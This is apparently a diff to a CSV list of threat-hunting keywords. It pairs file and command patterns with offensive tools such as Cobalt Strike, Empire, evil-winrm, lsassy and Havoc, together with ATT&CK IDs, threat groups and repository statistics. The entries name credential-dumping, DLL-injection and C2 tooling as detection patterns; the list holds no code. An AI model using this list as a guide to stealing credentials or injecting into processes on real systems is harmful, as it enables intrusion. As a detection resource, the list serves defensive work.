 "*dll_spawn_cmd.cpp*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z"
 "*DLL_TO_HIJACK_WIN10*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z"
 "*DllCanUnloadNow*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","",""
 "*dllexploit.*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z"
-"*DllExport -*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
-"*DLLHijackAuditKit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*DLLHijackAuditKit.zip*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*DllExport -*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"*DLLHijackAuditKit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*DLLHijackAuditKit.zip*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*DLL-Hijack-Search-Order-BOF*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
 "*dllinject *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
-"*dllinject.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z"
-"*-DllInjection.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*dllKitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
-"*DllLdr.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
+"*dllinject.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*-DllInjection.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*dllKitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*DllLdr.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
 "*dllload *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
-"*Dll-Loader -http -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
-"*Dll-Loader -local -path*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" -"*Dll-Loader -smb -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -http -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. 
Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -local -path*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*Dll-Loader -smb -path *","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "*DllLoaderLoader.exe*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" -"*-DllName *-Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-DllName *-Module *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DllNotificationInjection.cpp*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*DllNotificationInjection.exe*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*DllNotificationInjection.sln*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" 
@@ -9393,46 +9541,46 @@ "*DllNotificationInjection-master*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" "*dllproxy.py*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*DllProxy-main*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" -"*dllsearcher *.dll*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 